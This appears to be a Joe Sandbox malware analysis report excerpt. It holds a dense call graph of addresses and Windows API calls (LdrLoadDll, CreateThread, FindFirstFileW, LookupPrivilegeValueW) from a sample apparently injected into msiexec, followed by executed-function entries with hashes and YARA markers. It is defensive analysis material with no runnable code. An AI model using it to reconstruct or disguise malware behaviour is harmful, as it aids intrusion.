30733->30734 30735 63d2fa 30734->30735 30736 63d050 LdrLoadDll 30735->30736 30737 63d303 30736->30737 30738 63d050 LdrLoadDll 30737->30738 30739 63d30c 30738->30739 30740 63d050 LdrLoadDll 30739->30740 30741 63d315 30740->30741 30742 63d050 LdrLoadDll 30741->30742 30743 63d31e 30742->30743 30744 63d050 LdrLoadDll 30743->30744 30745 63d32a 30744->30745 30746 63d050 LdrLoadDll 30745->30746 30747 63d333 30746->30747 30748 63d050 LdrLoadDll 30747->30748 30749 63d33c 30748->30749 30749->30485 30751 63d3d0 LdrLoadDll 30750->30751 30752 63c2dc 30751->30752 30778 4559860 LdrInitializeThunk 30752->30778 30753 63c2f3 30753->30487 30755->30482 30756->30626 30758 63f490 30757->30758 30759 63f496 30757->30759 30758->30632 30760 63e3e0 LdrLoadDll 30759->30760 30761 63f4bc 30760->30761 30761->30632 30763 63f520 30762->30763 30764 63f57d 30763->30764 30765 63e3e0 LdrLoadDll 30763->30765 30764->30640 30766 63f55a 30765->30766 30767 63e300 2 API calls 30766->30767 30767->30764 30769 63e300 2 API calls 30768->30769 30770 636c34 30769->30770 30770->30651 30771->30636 30773 63d06b 30772->30773 30774 637780 LdrLoadDll 30773->30774 30775 63d08b 30774->30775 30776 637780 LdrLoadDll 30775->30776 30777 63d13f 30775->30777 30776->30777 30777->30673 30777->30777 30778->30753 30780 4559681 30779->30780 30781 455968f LdrInitializeThunk 30779->30781 30780->30491 30781->30491 30783 63ca8c RtlFreeHeap 30782->30783 30784 63d3d0 LdrLoadDll 30782->30784 30783->30494 30784->30783 30786 627680 30785->30786 30787 62767b 30785->30787 30788 63e280 LdrLoadDll 30786->30788 30787->30425 30794 6276a5 30788->30794 30789 627708 30789->30425 30790 63c2c0 2 API calls 30790->30794 30791 62770e 30793 627734 30791->30793 30795 63c9c0 2 API calls 30791->30795 30793->30425 30794->30789 30794->30790 30794->30791 30796 63e280 LdrLoadDll 30794->30796 30801 63c9c0 30794->30801 30797 627725 30795->30797 30796->30794 30797->30425 30799 63c9c0 2 API calls 30798->30799 30800 62794e 30799->30800 30800->30382 30802 63d3d0 LdrLoadDll 30801->30802 30803 63c9dc 30802->30803 30806 45596e0 LdrInitializeThunk 30803->30806 30804 63c9f3 30804->30794 30806->30804 30808 63da63 30807->30808 30809 62b160 LdrLoadDll 30808->30809 30810 629ffd 30809->30810 30810->30388 30812 62b4d3 30811->30812 30814 62b550 30812->30814 30823 63c090 LdrLoadDll 30812->30823 30814->30395 30816 63cbef LookupPrivilegeValueW 30815->30816 30817 63d3d0 LdrLoadDll 30815->30817 30816->30400 30817->30816 30819 63d3d0 LdrLoadDll 30818->30819 30820 63c67c 30819->30820 30824 4559910 LdrInitializeThunk 30820->30824 30821 63c69b 30821->30401 30823->30814 30824->30821 30826 62b657 30825->30826 30827 62b4b0 LdrLoadDll 30826->30827 30828 62b6ba 30827->30828 30828->30343 30830 62b3a4 30829->30830 30875 63c090 LdrLoadDll 30830->30875 30832 62b3de 30832->30345 30834 62e2fc 30833->30834 30835 62b630 LdrLoadDll 30834->30835 30836 62e30e 30835->30836 30876 62e1a0 30836->30876 30839 62e341 30841 62e352 30839->30841 30844 63c890 2 API calls 30839->30844 30840 62e329 30842 62e334 30840->30842 30843 63c890 2 API calls 30840->30843 30841->30348 30842->30348 30843->30842 30844->30841 30846 62c886 30845->30846 30847 62c890 30845->30847 30846->30357 30848 62b4b0 LdrLoadDll 30847->30848 30849 62c901 30848->30849 30850 62b380 LdrLoadDll 30849->30850 30851 62c915 30850->30851 30852 62c938 30851->30852 30853 62b4b0 LdrLoadDll 30851->30853 30852->30357 30854 62c954 30853->30854 30855 637370 9 API calls 30854->30855 30856 62c9a9 30855->30856 30856->30357 30860 628d9a 30857->30860 30895 62e590 30857->30895 30859 6290f1 30859->30370 30860->30859 30901 636ca0 30860->30901 30862 63f480 LdrLoadDll 30863 628f95 30862->30863 30864 63f5b0 2 API calls 30863->30864 30870 628faa 30864->30870 30865 628df6 30865->30859 30865->30862 30866 627670 3 API calls 30866->30870 30870->30859 30870->30866 30871 627930 2 API calls 30870->30871 30904 62c5c0 30870->30904 30954 62e530 30870->30954 30958 62df90 30870->30958 30871->30870 30872->30351 30873->30362 30874->30371 30875->30832 30877 62e1ba 30876->30877 30878 62e270 30876->30878 30879 62b4b0 LdrLoadDll 30877->30879 30878->30839 30878->30840 30880 62e1dc 30879->30880 30886 63c340 30880->30886 30882 62e21e 30889 63c380 30882->30889 30885 63c890 2 API calls 30885->30878 30887 63d3d0 LdrLoadDll 30886->30887 30888 63c35c 30887->30888 30888->30882 30890 63c39c 30889->30890 30891 63d3d0 LdrLoadDll 30889->30891 30894 4559fe0 LdrInitializeThunk 30890->30894 30891->30890 30892 62e264 30892->30885 30894->30892 30896 62e59d 30895->30896 30897 637780 LdrLoadDll 30896->30897 30898 62e5b5 30897->30898 30899 62e5c3 30898->30899 30900 62e5bc SetErrorMode 30898->30900 30899->30860 30900->30899 30972 62e360 30901->30972 30903 636cc6 30903->30865 30905 62c5df 30904->30905 30906 62c5d9 30904->30906 30998 629bd0 30905->30998 30991 62dc80 30906->30991 30909 62c5ec 30910 62c865 30909->30910 30911 63f5b0 2 API calls 30909->30911 30910->30870 30912 62c608 30911->30912 30913 62c61c 30912->30913 30914 62e530 2 API calls 30912->30914 31007 63c110 30913->31007 30914->30913 30917 62c743 31014 62c560 LdrLoadDll LdrInitializeThunk 30917->31014 30918 63c300 2 API calls 30919 62c69a 30918->30919 30919->30917 30924 62c6a6 30919->30924 30921 62c762 30922 62c76a 30921->30922 31015 62c4e0 LdrLoadDll NtClose LdrInitializeThunk 30921->31015 30925 63c890 2 API calls 30922->30925 30923 62c6ef 30929 63c890 2 API calls 30923->30929 30924->30910 30924->30923 30927 63c410 2 API calls 30924->30927 30928 62c774 30925->30928 30927->30923 30928->30870 30931 62c70c 30929->30931 30930 62c78c 30930->30922 30932 62c793 30930->30932 31010 63b770 30931->31010 30933 62c7ab 30932->30933 31016 62c460 LdrLoadDll LdrInitializeThunk 30932->31016 31017 63c190 LdrLoadDll 30933->31017 30935 62c723 30935->30910 31013 627ae0 LdrLoadDll 30935->31013 30938 62c7bf 31018 62c2c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 30938->31018 30941 62c739 30941->30870 30942 62c7e3 30943 62c824 30942->30943 31019 63c1c0 LdrLoadDll 30942->31019 31021 63c220 LdrLoadDll 30943->31021 30946 62c832 30948 63c890 2 API calls 30946->30948 30947 62c801 30947->30943 31020 63c250 LdrLoadDll 30947->31020 30949 62c83c 30948->30949 30950 63c890 2 API calls 30949->30950 30952 62c846 30950->30952 30952->30910 31022 627ae0 LdrLoadDll 30952->31022 30955 62e543 30954->30955 31044 63c290 30955->31044 30959 62dfc7 30958->30959 30960 62dfa7 30958->30960 30965 62e009 30959->30965 31070 62dc00 30959->31070 30960->30959 31050 62ddc0 30960->31050 30969 62e03b 30965->30969 31092 62d5b0 11 API calls 30965->31092 30970 62e061 30969->30970 31093 63aea0 10 API calls 30969->31093 30970->30870 30971 637370 9 API calls 30971->30965 30973 62e37d 30972->30973 30979 63c3c0 30973->30979 30976 62e3c5 30976->30903 30980 63d3d0 LdrLoadDll 30979->30980 30981 63c3dc 30980->30981 30989 45599a0 LdrInitializeThunk 30981->30989 30982 62e3be 30982->30976 30984 63c410 30982->30984 30985 63c42c 30984->30985 30986 63d3d0 LdrLoadDll 30984->30986 30990 4559780 LdrInitializeThunk 30985->30990 30986->30985 30987 62e3ee 30987->30903 30989->30982 30990->30987 30996 62dc9e 30991->30996 31023 62d630 30991->31023 30993 62dda2 30994 63e3e0 LdrLoadDll 30993->30994 30995 62ddb1 30994->30995 30995->30905 30996->30993 31032 63b5f0 30996->31032 30999 629beb 30998->30999 31000 62e1a0 3 API calls 30999->31000 31006 629d0b 30999->31006 31001 629cec 31000->31001 31002 629d1a 31001->31002 31003 629d01 31001->31003 31005 63c890 2 API calls 31001->31005 31002->30909 31043 626ca0 LdrLoadDll 31003->31043 31005->31003 31006->30909 31008 63d3d0 LdrLoadDll 31007->31008 31009 62c670 31008->31009 31009->30910 31009->30917 31009->30918 31011 63b7a2 31010->31011 31012 62e530 2 API calls 31010->31012 31011->30935 31012->31011 31013->30941 31014->30921 31015->30930 31016->30933 31017->30938 31018->30942 31019->30947 31020->30943 31021->30946 31022->30910 31024 62d663 31023->31024 31038 62b7a0 31024->31038 31026 62d675 31027 62e360 3 API calls 31026->31027 31028 62d6b8 31027->31028 31029 62d6bf 31028->31029 31042 63e420 LdrLoadDll 31028->31042 31029->30996 31031 62d6cf 31031->30996 31033 63b5ff 31032->31033 31034 637780 LdrLoadDll 31033->31034 31035 63b617 31034->31035 31036 63b63d 31035->31036 31037 63b62a CreateThread 31035->31037 31036->30993 31037->30993 31039 62b7c7 31038->31039 31040 62b4b0 LdrLoadDll 31039->31040 31041 62b803 31040->31041 31041->31026 31042->31031 31043->31006 31045 63c2ac 31044->31045 31046 63d3d0 LdrLoadDll 31044->31046 31049 4559840 LdrInitializeThunk 31045->31049 31046->31045 31047 62e56e 31047->30870 31049->31047 31051 62ddf0 31050->31051 31094 636690 31051->31094 31053 62de41 31123 635540 31053->31123 31055 62de47 31157 632360 31055->31157 31057 62de4d 31188 6345c0 31057->31188 31063 62de61 31232 635db0 31063->31232 31065 62de67 31256 62fca0 31065->31256 31067 62de7f 31271 630f40 31067->31271 31071 62dc18 31070->31071 31075 62dc6f 31070->31075 31072 631180 9 API calls 31071->31072 31071->31075 31073 62dc59 31072->31073 31073->31075 31552 6313d0 11 API calls 31073->31552 31075->30970 31076 62da40 31075->31076 31077 62da5c 31076->31077 31080 62db3b 31076->31080 31078 63c890 2 API calls 31077->31078 31077->31080 31082 62da77 31078->31082 31079 637370 9 API calls 31083 62dbee 31079->31083 31089 62dbd1 31080->31089 31554 62cf30 LdrLoadDll NtClose LdrInitializeThunk 31080->31554 31553 62cf30 LdrLoadDll NtClose LdrInitializeThunk 31082->31553 31083->30965 31083->30971 31084 62dbab 31084->31089 31555 62d100 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31084->31555 31086 62daaf 31088 62b4b0 LdrLoadDll 31086->31088 31090 62dac0 31088->31090 31089->31079 31089->31083 31091 62b4b0 LdrLoadDll 31090->31091 31091->31080 31092->30969 31093->30970 31095 6366b8 31094->31095 31096 62b4b0 LdrLoadDll 31095->31096 31097 6366cc 31096->31097 31098 62ccf0 3 API calls 31097->31098 31100 6366ff 31098->31100 31099 636706 31099->31053 31100->31099 31101 62b4b0 LdrLoadDll 31100->31101 31102 63672e 31101->31102 31103 62b4b0 LdrLoadDll 31102->31103 31104 636752 31103->31104 31276 62cdb0 31104->31276 31106 6367b8 31108 62b4b0 LdrLoadDll 31106->31108 31107 636776 31107->31106 31120 63693b 31107->31120 31280 6363e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 31107->31280 31110 6367d8 31108->31110 31111 62cdb0 2 API calls 31110->31111 31114 6367fc 31111->31114 31112 636842 31113 62cdb0 2 API calls 31112->31113 31117 636872 31113->31117 31114->31112 31114->31120 31281 6363e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 31114->31281 31116 6368b8 31119 62cdb0 2 API calls 31116->31119 31117->31116 31117->31120 31282 6363e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 31117->31282 31121 636917 31119->31121 31120->31053 31121->31120 31283 6363e0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk 31121->31283 31124 6355a4 31123->31124 31125 62b4b0 LdrLoadDll 31124->31125 31126 635671 31125->31126 31127 62ccf0 3 API calls 31126->31127 31129 6356a4 31127->31129 31128 6356ab 31128->31055 31129->31128 31130 62b4b0 LdrLoadDll 31129->31130 31131 6356d3 31130->31131 31132 62cdb0 2 API calls 31131->31132 31134 635713 31132->31134 31133 635833 31133->31055 31134->31133 31135 635842 31134->31135 31290 635330 31134->31290 31136 63c890 2 API calls 31135->31136 31138 63584c 31136->31138 31138->31055 31139 635748 31139->31135 31140 635753 31139->31140 31141 63e3e0 LdrLoadDll 31140->31141 31142 63577c 31141->31142 31143 635785 31142->31143 31144 63579b 31142->31144 31145 63c890 2 API calls 31143->31145 31319 635220 CoInitialize 31144->31319 31147 63578f 31145->31147 31147->31055 31148 6357a9 31321 63c5a0 31148->31321 31150 635822 31151 63c890 2 API calls 31150->31151 31152 63582c 31151->31152 31154 63e300 2 API calls 31152->31154 31154->31133 31155 6357c7 31155->31150 31156 63c5a0 LdrLoadDll 31155->31156 31324 635150 LdrLoadDll RtlFreeHeap 31155->31324 31156->31155 31158 632388 31157->31158 31159 63e3e0 LdrLoadDll 31158->31159 31161 6323e8 31159->31161 31160 6323f1 31160->31057 31161->31160 31325 6317c0 31161->31325 31163 63241a 31173 63243a 31163->31173 31355 631ad0 LdrLoadDll 31163->31355 31165 632428 31165->31173 31356 6320e0 9 API calls 31165->31356 31167 63244c 31358 6340c0 10 API calls 31167->31358 31170 632472 31174 6317c0 10 API calls 31170->31174 31172 632458 31172->31170 31359 62b2b0 LdrLoadDll 31172->31359 31173->31172 31357 6340c0 10 API calls 31173->31357 31175 63249f 31174->31175 31176 6324c0 31175->31176 31360 631ad0 LdrLoadDll 31175->31360 31177 6324de 31176->31177 31362 6340c0 10 API calls 31176->31362 31181 6324f8 31177->31181 31364 62b2b0 LdrLoadDll 31177->31364 31179 6324ae 31179->31176 31361 6320e0 9 API calls 31179->31361 31184 63e300 2 API calls 31181->31184 31182 6324d2 31363 6340c0 10 API calls 31182->31363 31185 632502 31184->31185 31185->31057 31189 6345e6 31188->31189 31190 62b4b0 LdrLoadDll 31189->31190 31192 634615 31190->31192 31191 634641 31380 62e790 31191->31380 31192->31191 31193 62b4b0 LdrLoadDll 31192->31193 31193->31191 31195 634725 31196 62de55 31195->31196 31385 6342d0 31195->31385 31198 635860 31196->31198 31199 6345c0 10 API calls 31198->31199 31200 62de5b 31199->31200 31201 6332e0 31200->31201 31202 633302 31201->31202 31203 62b4b0 LdrLoadDll 31202->31203 31204 6334cd 31203->31204 31205 62b4b0 LdrLoadDll 31204->31205 31206 6334de 31205->31206 31207 62b380 LdrLoadDll 31206->31207 31208 6334f5 31207->31208 31465 6331a0 31208->31465 31211 6331a0 12 API calls 31212 633568 31211->31212 31213 6331a0 12 API calls 31212->31213 31214 633580 31213->31214 31215 6331a0 12 API calls 31214->31215 31216 633598 31215->31216 31217 6331a0 12 API calls 31216->31217 31218 6335b0 31217->31218 31219 6331a0 12 API calls 31218->31219 31221 6335cb 31219->31221 31220 6335e5 31220->31063 31221->31220 31222 6331a0 12 API calls 31221->31222 31223 633619 31222->31223 31224 6331a0 12 API calls 31223->31224 31225 633656 31224->31225 31226 6331a0 12 API calls 31225->31226 31227 633693 31226->31227 31228 6331a0 12 API calls 31227->31228 31229 6336d0 31228->31229 31230 6331a0 12 API calls 31229->31230 31231 63370d 31230->31231 31231->31063 31233 635dcd 31232->31233 31234 62b160 LdrLoadDll 31233->31234 31235 635de8 31234->31235 31236 637780 LdrLoadDll 31235->31236 31253 635fec 31235->31253 31237 635e18 31236->31237 31238 637780 LdrLoadDll 31237->31238 31239 635e31 31238->31239 31240 637780 LdrLoadDll 31239->31240 31241 635e4a 31240->31241 31242 637780 LdrLoadDll 31241->31242 31243 635e66 31242->31243 31244 637780 LdrLoadDll 31243->31244 31245 635e7f 31244->31245 31246 637780 LdrLoadDll 31245->31246 31247 635e98 31246->31247 31248 637780 LdrLoadDll 31247->31248 31249 635eb4 31248->31249 31250 637780 LdrLoadDll 31249->31250 31251 635ecd 31250->31251 31252 637780 LdrLoadDll 31251->31252 31254 635ee5 31252->31254 31253->31065 31254->31253 31480 6359a0 LdrLoadDll 31254->31480 31257 62fcb6 31256->31257 31260 62fcc1 31256->31260 31258 63e3e0 LdrLoadDll 31257->31258 31258->31260 31259 62fcd7 31259->31067 31260->31259 31261 637780 LdrLoadDll 31260->31261 31262 62fdbc GetFileAttributesW 31260->31262 31263 62ff3f 31260->31263 31267 62b4b0 LdrLoadDll 31260->31267 31268 633720 9 API calls 31260->31268 31481 63aa90 31260->31481 31485 63a920 9 API calls 31260->31485 31486 63a7c0 9 API calls 31260->31486 31261->31260 31262->31260 31264 63e300 2 API calls 31263->31264 31265 62ff58 31263->31265 31264->31265 31265->31067 31267->31260 31268->31260 31487 630cc0 31271->31487 31273 630f4d 31508 6309a0 31273->31508 31275 62de91 31275->30959 31277 62cdd5 31276->31277 31284 63c490 31277->31284 31280->31106 31281->31112 31282->31116 31283->31120 31285 63d3d0 LdrLoadDll 31284->31285 31286 63c4ac 31285->31286 31289 45596d0 LdrInitializeThunk 31286->31289 31287 62ce49 31287->31107 31289->31287 31291 63534c 31290->31291 31292 62b160 LdrLoadDll 31291->31292 31294 635367 31292->31294 31293 635370 31293->31139 31294->31293 31295 637780 LdrLoadDll 31294->31295 31296 63538d 31295->31296 31297 637780 LdrLoadDll 31296->31297 31298 6353a8 31297->31298 31299 637780 LdrLoadDll 31298->31299 31300 6353c1 31299->31300 31301 637780 LdrLoadDll 31300->31301 31302 6353dd 31301->31302 31303 637780 LdrLoadDll 31302->31303 31304 6353f6 31303->31304 31305 637780 LdrLoadDll 31304->31305 31306 63540f 31305->31306 31307 62b160 LdrLoadDll 31306->31307 31309 63543b 31307->31309 31308 6354e9 31308->31139 31309->31308 31310 637780 LdrLoadDll 31309->31310 31311 63545f 31310->31311 31312 62b160 LdrLoadDll 31311->31312 31313 635494 31312->31313 31313->31308 31314 637780 LdrLoadDll 31313->31314 31315 6354b7 31314->31315 31316 637780 LdrLoadDll 31315->31316 31317 6354d0 31316->31317 31318 637780 LdrLoadDll 31317->31318 31318->31308 31320 635285 31319->31320 31320->31148 31322 63d3d0 LdrLoadDll 31321->31322 31323 63c5bc 31322->31323 31323->31155 31324->31155 31326 631858 31325->31326 31327 62b4b0 LdrLoadDll 31326->31327 31328 6318f6 31327->31328 31329 62b4b0 LdrLoadDll 31328->31329 31330 631911 31329->31330 31331 62cdb0 2 API calls 31330->31331 31332 631936 31331->31332 31333 631a7d 31332->31333 31377 63c520 LdrLoadDll 31332->31377 31334 631a8e 31333->31334 31365 631180 31333->31365 31334->31163 31337 631964 31338 631a73 31337->31338 31340 63196f 31337->31340 31339 63c890 2 API calls 31338->31339 31339->31333 31341 63c890 2 API calls 31340->31341 31342 6319a9 31341->31342 31378 63e4c0 LdrLoadDll 31342->31378 31344 6319df 31344->31334 31345 62cdb0 2 API calls 31344->31345 31346 631a05 31345->31346 31346->31334 31379 63c520 LdrLoadDll 31346->31379 31348 631a2a 31349 631a31 31348->31349 31350 631a5d 31348->31350 31351 63c890 2 API calls 31349->31351 31352 63c890 2 API calls 31350->31352 31353 631a3b 31351->31353 31354 631a67 31352->31354 31353->31163 31354->31163 31355->31165 31356->31173 31357->31167 31358->31172 31359->31170 31360->31179 31361->31176 31362->31182 31363->31177 31364->31181 31366 6311a5 31365->31366 31367 62b4b0 LdrLoadDll 31366->31367 31368 631260 31367->31368 31369 62b4b0 LdrLoadDll 31368->31369 31370 631284 31369->31370 31371 637370 9 API calls 31370->31371 31373 6312d7 31371->31373 31372 631391 31372->31334 31373->31372 31374 62b4b0 LdrLoadDll 31373->31374 31375 63133e 31374->31375 31376 637370 9 API calls 31375->31376 31376->31372 31377->31337 31378->31344 31379->31348 31381 62e7af 31380->31381 31382 637780 LdrLoadDll 31380->31382 31383 62e7b6 GetFileAttributesW 31381->31383 31384 62e7c1 31381->31384 31382->31381 31383->31384 31384->31195 31409 63abf0 31385->31409 31387 63433b 31387->31195 31388 6342e6 31388->31387 31389 634347 31388->31389 31390 634305 31388->31390 31393 62b4b0 LdrLoadDll 31389->31393 31391 63432a 31390->31391 31392 63430d 31390->31392 31395 63e300 2 API calls 31391->31395 31394 63e300 2 API calls 31392->31394 31396 634358 31393->31396 31397 63431e 31394->31397 31395->31387 31398 637370 9 API calls 31396->31398 31397->31195 31399 63436f 31398->31399 31449 633720 31399->31449 31401 63437a 31402 634392 31401->31402 31403 634478 31401->31403 31406 63445f 31402->31406 31459 633cb0 9 API calls 31402->31459 31403->31406 31460 633cb0 9 API calls 31403->31460 31404 63e300 2 API calls 31405 634583 31404->31405 31405->31195 31406->31404 31410 63abfe 31409->31410 31411 63ac05 31409->31411 31410->31388 31412 62b160 LdrLoadDll 31411->31412 31413 63ac37 31412->31413 31416 63ac46 31413->31416 31461 63a6e0 LdrLoadDll 31413->31461 31415 63e3e0 LdrLoadDll 31417 63ac5f 31415->31417 31416->31415 31418 63ae29 31416->31418 31417->31418 31419 63ac74 31417->31419 31420 63add8 31417->31420 31418->31388 31462 633800 LdrLoadDll 31419->31462 31421 63ade2 31420->31421 31422 63ae7b 31420->31422 31463 633800 LdrLoadDll 31421->31463 31425 63e300 2 API calls 31422->31425 31425->31418 31426 63ac8b 31430 637780 LdrLoadDll 31426->31430 31427 63adf9 31464 63a010 LdrLoadDll 31427->31464 31429 63ae0f 31432 637780 LdrLoadDll 31429->31432 31431 63aca7 31430->31431 31433 637780 LdrLoadDll 31431->31433 31432->31418 31434 63acc3 31433->31434 31435 637780 LdrLoadDll 31434->31435 31436 63ace2 31435->31436 31437 637780 LdrLoadDll 31436->31437 31438 63acfe 31437->31438 31439 637780 LdrLoadDll 31438->31439 31440 63ad1a 31439->31440 31441 637780 LdrLoadDll 31440->31441 31442 63ad39 31441->31442 31443 637780 LdrLoadDll 31442->31443 31444 63ad55 31443->31444 31445 637780 LdrLoadDll 31444->31445 31446 63ad78 31445->31446 31446->31418 31447 63e300 2 API calls 31446->31447 31448 63adcc 31447->31448 31448->31388 31450 637370 9 API calls 31449->31450 31451 633736 31450->31451 31452 633743 31451->31452 31453 637370 9 API calls 31451->31453 31452->31401 31454 633754 31453->31454 31454->31452 31455 637370 9 API calls 31454->31455 31456 63376f 31455->31456 31457 63e300 2 API calls 31456->31457 31458 63377c 31457->31458 31458->31401 31459->31402 31460->31403 31461->31416 31462->31426 31463->31427 31464->31429 31466 6331c9 31465->31466 31467 637780 LdrLoadDll 31466->31467 31468 633206 31467->31468 31469 637780 LdrLoadDll 31468->31469 31470 633224 31469->31470 31471 637780 LdrLoadDll 31470->31471 31473 633246 31471->31473 31472 6332cc 31472->31211 31473->31472 31474 633270 FindFirstFileW 31473->31474 31474->31472 31478 63328b 31474->31478 31475 6332b3 FindNextFileW 31477 6332c5 FindClose 31475->31477 31475->31478 31477->31472 31478->31475 31479 633080 12 API calls 31478->31479 31479->31478 31480->31254 31482 63aaa6 31481->31482 31484 63aba6 31481->31484 31483 637370 9 API calls 31482->31483 31482->31484 31483->31482 31484->31260 31485->31260 31486->31260 31488 630ce5 31487->31488 31489 62b4b0 LdrLoadDll 31488->31489 31490 630d4a 31489->31490 31491 62b4b0 LdrLoadDll 31490->31491 31492 630d98 31491->31492 31493 62e790 2 API calls 31492->31493 31494 630ddf 31493->31494 31495 630de6 31494->31495 31496 63abf0 2 API calls 31494->31496 31495->31273 31498 630df4 31496->31498 31497 630dfd 31497->31273 31498->31497 31499 62b4b0 LdrLoadDll 31498->31499 31501 630e4c 31499->31501 31500 63aa90 9 API calls 31500->31501 31501->31500 31503 630ed1 31501->31503 31521 630400 31501->31521 31505 630f29 31503->31505 31532 630760 31503->31532 31506 63e300 2 API calls 31505->31506 31507 630f30 31506->31507 31507->31273 31509 6309b6 31508->31509 31512 6309c1 31508->31512 31510 63e3e0 LdrLoadDll 31509->31510 31510->31512 31511 6309d7 31511->31275 31512->31511 31513 62e790 2 API calls 31512->31513 31514 630c90 31512->31514 31517 63aa90 9 API calls 31512->31517 31518 630400 9 API calls 31512->31518 31519 62b4b0 LdrLoadDll 31512->31519 31520 630760 9 API calls 31512->31520 31513->31512 31515 63e300 2 API calls 31514->31515 31516 630ca9 31514->31516 31515->31516 31516->31275 31517->31512 31518->31512 31519->31512 31520->31512 31522 630426 31521->31522 31523 637370 9 API calls 31522->31523 31524 630482 31523->31524 31525 633720 9 API calls 31524->31525 31526 63048d 31525->31526 31528 630610 31526->31528 31529 6304ab 31526->31529 31527 6305f5 31527->31501 31528->31527 31530 6302d0 9 API calls 31528->31530 31529->31527 31538 6302d0 31529->31538 31530->31528 31533 630786 31532->31533 31534 637370 9 API calls 31533->31534 31535 6307f7 31534->31535 31536 633720 9 API calls 31535->31536 31537 630802 31536->31537 31537->31503 31539 6302e6 31538->31539 31542 633b90 31539->31542 31541 6303ee 31541->31529 31544 633bcd 31542->31544 31543 633c7d 31543->31541 31544->31543 31546 633c20 31544->31546 31549 634b70 31544->31549 31547 633c59 31546->31547 31548 63e300 2 API calls 31546->31548 31547->31541 31548->31547 31550 6348b0 9 API calls 31549->31550 31551 634b84 31550->31551 31551->31546 31552->31075 31553->31086 31554->31084 31555->31089 31556 63b4b0 31557 63e280 LdrLoadDll 31556->31557 31559 63b4eb 31556->31559 31557->31559 31558 63b5e6 31559->31558 31560 62b160 LdrLoadDll 31559->31560 31561 63b52b 31560->31561 31562 637780 LdrLoadDll 31561->31562 31564 63b550 31562->31564 31563 63b560 Sleep 31563->31564 31564->31558 31564->31563 31567 63b120 LdrLoadDll 31564->31567 31568 63b300 LdrLoadDll 31564->31568 31567->31564 31568->31564 31570 4559540 LdrInitializeThunk 31572 62eb9e 31573 62eba3 31572->31573 31575 62eb8f 31572->31575 31574 637370 9 API calls 31573->31574 31574->31575

                                                                  Executed Functions

                                                                  Function 006331A0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,00000000), ref: 00633281
                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 006332BE
                                                                  • FindClose.KERNEL32(?), ref: 006332C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  • Opcode ID: dc9b3bc0544ac893b94b9d92acb10c5a0b8d29a133be0aed039d4294c39566b2
                                                                  • Instruction ID: 2b6c9cb0e04b4cafb26311b4d88bba0bbde00658c800083b839f3acf193768c8
                                                                  • Opcode Fuzzy Hash: dc9b3bc0544ac893b94b9d92acb10c5a0b8d29a133be0aed039d4294c39566b2
                                                                  • Instruction Fuzzy Hash: B83163B1900359BBEB60DBA4CC85FEF777DEB44704F14455CF908A6281DA70AB858BE4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00628D80 Relevance: 2.8, Strings: 2, Instructions: 288COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID: 7$G{@1
                                                                  • API String ID: 2340568224-1664923512
                                                                  • Opcode ID: 6c18a8c6cfb000065923d4a3a27eed131083a93229235b6252260cc53b68182a
                                                                  • Instruction ID: 9565480315472788cb25669cbe64dfee3874174b7b9f2b31fd8b8f0daa51b0a7
                                                                  • Opcode Fuzzy Hash: 6c18a8c6cfb000065923d4a3a27eed131083a93229235b6252260cc53b68182a
                                                                  • Instruction Fuzzy Hash: 05A1A3B1D00618ABDB64DFA4DC41FEEB7BAAF44304F10855DF519A7241EB30AA448FA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00628D7F Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorMode
                                                                  • String ID: 7$G{@1
                                                                  • API String ID: 2340568224-1664923512
                                                                  • Opcode ID: 27a0d2e490c4a32b142170ce0af58cbeab771d6cf10b9e9e436b234a07047c1a
                                                                  • Instruction ID: 143b85727cf12abe89c0b810afbf0a67de004d35b1dd251903703904ab654622
                                                                  • Opcode Fuzzy Hash: 27a0d2e490c4a32b142170ce0af58cbeab771d6cf10b9e9e436b234a07047c1a
                                                                  • Instruction Fuzzy Hash: EC71A6B1D006196ADB60DBA4DC41FEEB7BAAF44304F10455DF61863241EB716B44CFB9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0063C80A Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtReadFile.NTDLL(006376A0,00632B68,FFFFFFFF,0063718A,00000002,?,006376A0,00000002,0063718A,FFFFFFFF,00632B68,006376A0,00000002,00000000), ref: 0063C855
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_620000_msiexec.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
